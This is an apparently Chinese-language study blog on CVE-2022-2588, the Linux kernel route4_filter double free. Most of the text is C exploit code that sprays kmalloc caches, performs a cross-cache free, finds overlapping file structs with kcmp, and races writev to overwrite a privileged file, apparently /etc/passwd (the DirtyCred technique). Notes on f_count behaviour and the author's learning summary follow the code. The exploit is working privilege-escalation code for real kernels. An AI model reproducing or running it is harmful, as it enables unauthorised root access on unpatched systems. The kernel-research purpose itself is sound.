      printf("[2] spray (38+3)*32 kmalloc-192 & kmalloc-256\n");
      for (int i = 0; i < middle; i++)
        add_tc_basic(sprayfd, i + 1, payload, 193, 32);

      add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
      add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
      add_tc_basic(sprayfd, middle + 3, payload, 193, 32);
      if (write(pipe_child[1], "OK", 2) != 2)
        err(1, "[-] write to parent\n");
// 4. spray more filters in kmalloc-192 & kmalloc-256
      if (read(pipe_parent[0], msg, 2) != 2)
        err(1, "[-] read from parent");
      // add_tc_basic(sprayfd, middle+2, payload, 129, 32);

      // prepare another part for cross cache
      printf("[4] spray kmalloc-192 & kmalloc-256\n");
      for (int i = middle + 2; i < end; i++)
        add_tc_basic(sprayfd, i + 1, payload, 193, 32);
// 5. free (end-24)*32 kmalloc-192 & kmalloc-256
      printf("[5] free (end-24)*32 kmalloc-192 & kmalloc-256\n");
      for (int i = 1; i < end - 24; i++) {
        // prevent double free of 192 and being reclaimed by others
        if (i == middle || i == middle + 1)
          continue;
        delete_tc_basic(sprayfd, i + 1);
      }
      if (write(pipe_child[1], "OK", 2) != 2)
        err(1, "[-] write to parent\n");
// 7. free (end-middle+1)*32 kmalloc-192 & kmalloc-256
      if (read(pipe_parent[0], msg, 2) != 2)
        err(1, "[-] read from parent");
      // if (cpu_cores == 1) sleep(1);
      printf("[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256\n");
      delete_tc_basic(sprayfd, middle + 2);
      delete_tc_basic(sprayfd, middle + 3);
      delete_tc_basic(sprayfd, 1);
      for (int i = middle + 2; i < end; i++)
        delete_tc_basic(sprayfd, i + 1);
      //getchar();
      if (write(pipe_child[1], "OK", 2) != 2)
        err(1, "[-] write to parent\n");
      while (1) {sleep(1000);}
    }

进程D是关键进程，首先确定已经可以doublefree了，然后喷射一堆低凭证file，接着第一次kfree大小为0x100的obj，然后喷射一堆低凭证file拿到刚free的obj，接着doublefree这个obj，然后再喷射低凭证file，这样就有两个文件描述符指向同一个file，而且这个file的f_count为1，接着开启三个线程，替换低凭证为高凭证，前面我已经说过过程了，就不赘述了。

/*
 * slow_write() —— thread 1: keep "./uaf" busy with one very large writev().
 *
 * Maps up to 0x80000 / 20 anonymous pages starting at 0x30000000 and submits
 * the mapped region 20 times in one writev() call (about 2GB in total when
 * every page is mapped).  run_write is set to 1 just before the write starts
 * and cleared once it has finished, so other threads can synchronise on it.
 *
 * Exits the process if "./uaf" cannot be opened.  Always returns NULL.
 */
void *slow_write() {
  printf("[11-1] start slow write\n");
  clock_t start, end;
  int fd = open("./uaf", 1);
  if (fd < 0) {
    perror("[-] error open uaf file");
    exit(-1);
  }

  unsigned long int addr = 0x30000000;
  int offset;
  for (offset = 0; offset < 0x80000 / 20; offset++) {     // mmap space [0x30000000, 0x30000000 + 0x1000 * 0x80000 / 20]
    void *want = (void *)(addr + offset * 0x1000);
    // mmap reports failure with MAP_FAILED, never with a "negative" pointer;
    // anonymous mappings conventionally pass fd = -1.
    void *r = mmap(want, 0x1000,
                   PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (r == MAP_FAILED || r != want) {
      // Without MAP_FIXED the address is only a hint; a page placed
      // elsewhere would leave a hole in the region handed to writev().
      if (r != MAP_FAILED)
        munmap(r, 0x1000);
      printf("[-] allocate failed at 0x%x\n", (unsigned int)offset);
      break;      // only the contiguous prefix mapped so far is written
    }
  }
  assert(offset > 0);

  void *mem = (void *)(addr);
  memcpy(mem, "hhhhh", 5);
  struct iovec iov[20];
  for (int i = 0; i < 20; i++) { // write plenty of data (0x80000 * 0x1000 = 0x80 000 000 = 2GB)
    iov[i].iov_base = mem;
    iov[i].iov_len = offset * 0x1000;
  }

  run_write = 1;    // notify thread 2 (unprivileged `file`) to begin writing evil data
  start = clock();

  if (writev(fd, iov, 20) < 0)
    perror("slow write");
  end = clock();
  double spent = (double)(end - start) / CLOCKS_PER_SEC;
  printf("[*] write done, spent %f s\n", spent);
  run_write = 0;
  return NULL;      // thread entry points must return a value
}
// write_cmd() —— thread 2: once slow_write() has raised run_write, write
// `content` through overlap_a.  run_spray is set to 1 just before the write
// is issued so the main thread knows it may proceed.  Always returns NULL.
void *write_cmd() {
  struct iovec iov = {.iov_base = content, .iov_len = strlen(content)};

  while (!run_write) {}  // wait for thread 1 to prepare write
  printf("[11-2] write evil data after the slow write\n");
  run_spray = 1;
  if (writev(overlap_a, &iov, 1) < 0)
    printf("[-] failed to write\n");
  return NULL;  // thread entry points must return a value
}

/*
 * exploit() —— main driver of the attack (steps 3, 6, 8-13).
 *
 * Pins itself to CPU 0, opens a netlink socket and adds a qdisc, then walks
 * through the numbered steps below.  It stays in lock-step with the spraying
 * process by exchanging 2-byte messages over pipe_child / pipe_parent, and
 * asks the privileged-file sprayer to start through pipe_file_spray.
 *
 * The final verdict is reported as a single byte on pipe_main: 0x00 when the
 * target file starts with "hi", 0xff otherwise (including when no overlapped
 * file was found).  The function never returns; it ends in a sleep loop.
 *
 * NOTE(review): `lim` and `new_lim` are declared but never used.
 */
void exploit() {
  char msg[0x10] = {};
  struct rlimit old_lim, lim, new_lim;

  // Get old limits
  if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
    printf("Old limits -> soft limit= %ld \t"
           " hard limit= %ld \n",
           old_lim.rlim_cur, old_lim.rlim_max);
  pin_on_cpu(0);
  printf("[*] starting exploit, num of cores: %d\n", cpu_cores);
  // open & setup the socket
  sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
  assert(sockfd != -1);
  add_qdisc(sockfd);
// 3. allocate a route4_filter (vulnerable object)
  // wait for the 2-byte go-ahead on pipe_child first
  if (read(pipe_child[0], msg, 2) != 2)
    err(1, "[-] read from parent");
  printf("[3] allocate the vulnerable filter\n");
  add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE);  // handle = 0

  // hand control back to the other process
  if (write(pipe_parent[1], "OK", 2) != 2)
    err(1, "[-] write to child");
// 6. 1st free the route4_filter, return the `kmalloc-256` page to the page allocator
  if (read(pipe_child[0], msg, 2) != 2)
    err(1, "[-] read from parent");

  // free the object, to free the slab
  printf("[6] 1st freed the filter object\n");
  // getchar();
  add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE);         // handle = 0

  // wait for the vulnerable object being freed
  usleep(500 * 1000);
  if (write(pipe_parent[1], "OK", 2) != 2)
    err(1, "[-] write to child");
// 8. spray 4000 unprivileged `file`
  if (read(pipe_child[0], msg, 2) != 2)
    err(1, "[-] read from parent");

  usleep(1000 * 1000);
  printf("[8] spray 4000 uprivileged `file`\n");
  // one open("./data2") per iteration, rotating over the CPUs
  for (int i = 0; i < spray_num_1; i++) {
    pin_on_cpu(i % cpu_cores);
    fds[i] = open("./data2", 1);
    assert(fds[i] > 0);
  }
  // printf("pause before 2nd free\n");
  // getchar();
// 9. 2nd free route4_filter, which will free the file
  printf("[9] 2nd free the filter object\n");
  add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE);         // handle = 0
  printf("pause after 2nd free\n");
  // getchar();
  // sleep(10000);
  usleep(1000 * 100);   // should not sleep too long, otherwise file might be claimed by others

// 10. spray 5000 unprivileged `file` & find the overlapped file
  printf("[10] spraying 5000 unprivileged `file`\n");
  for (int i = 0; i < spray_num_2; i++) {
    pin_on_cpu(i % cpu_cores);
    fd_2[i] = open("./uaf", 1);
    assert(fd_2[i] > 0);
    // compare the new descriptor against every descriptor from step 8
    // NOTE(review): the inner loop keeps iterating after a match is handled
    for (int j = 0; j < spray_num_1; j++) {
// 10-1. spray one `file` & use kcmp to check if we take up the vulnerable object
      if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) == 0)
      {
        printf("[10-1] found overlapped file, id : %d, %d\n", i, j);
        overlap_a = fds[j];
        overlap_b = fd_2[i];
// 11. start 2 threads: Thread 1-take up write lock; Thread 2-write evil data
        printf("[11] start 2 threads compete to write\n");
        pthread_t pid, pid2;
        pthread_create(&pid, NULL, slow_write, NULL);
        pthread_create(&pid2, NULL, write_cmd, NULL);

        // spin until write_cmd signals that it is about to issue its write
        while (!run_spray) {}
// 12. spray privileged `file` object
        // kcmp matched these two descriptors above, so both name the same file
        // and both descriptors are closed.
        // NOTE(review): presumably the writev() still in flight in write_cmd
        // holds its own reference, so the object is only released after both
        // closes — confirm by watching f_count in a debugger.
        close(overlap_a);
        close(overlap_b);

        usleep(1000 * 100);
        int spray_num = 4096;
        // tell the sprayer process to start, then wait for its 2-byte reply
        write(pipe_file_spray[0][1], &spray_num, sizeof(int));
        if (read(pipe_file_spray[1][0], &msg, 2) != 2)
          err(1, "[-] read from file spray");
        overlapped = true;
      }
    }
    if (overlapped)
      break;
  }
// 13. finish exploitation
  sleep(3);
  // wait until slow_write() has cleared run_write
  while (run_write) {sleep(1);}
  printf("[13] check whether we overwrite the privileged file\n");
  if (!overlapped) {
    printf("[-] no overlap found :(...\n");
    write(pipe_main[1], "\xff", 1);
  } else {
    int xx = open(target, 0);
    char buf[0x100] = {};
    // check if user (hi) in the passwd
    read(xx, buf, 0x30);
    if (!strncmp(buf, "hi", 2))
      write(pipe_main[1], "\x00", 1);
    else {
      printf("[-] not successful : %s\n", buf);
      write(pipe_main[1], "\xff", 1);
    }
  }
  // never return
  while (1) {sleep(1000);}
}

具体过程可以看这两张图

调试了半个晚上终于把exp中关于file结构体引用计数的问题解决了，在一个进程中，主线程和所有的支线程共用一个struct files_struct结构体，所以在创建线程的时候并不会像创建子进程一样给所有的file的结构体的引用计数f_count加一，但是只要在子线程中使用了这个文件描述符（注意是使用，只有使用了才会加一，使用完还会减一），就会给对应的file的f_count加一，表示这个结构体正在被使用，所以在主线程close这个文件描述符之后，对应的file并没有被kfree掉，而是引用计数减一，但是这个file指针是在主线程中被清零的。而在某个地方肯定还记录着这个file的指针，以便后续kfree。

但比较奇怪的是，一个进程只有一个线程的时候，就算使用这个文件描述符，文件描述符对应的file的引用计数还是没有变的。（这大概是因为此时files_struct没有被其他线程共享，内核在取file时走了不增加引用计数的快速路径。）

这是支线程使用write正在写入时file的样子，可见f_count为2.

当开启了支线程但是没有使用文件描述符时file的样子，可见f_count为1

总结

这个cve的学习总算告一段落了，除了设置user namespace没怎么搞懂以外其他基本都明白了，也用exp调试打通了自己搭的环境，总的来说确实学到了好多。尤其是cross cache和dirty cred，还深入地了解了文件描述符到底是个什么东东了。

study

cve-2022-2588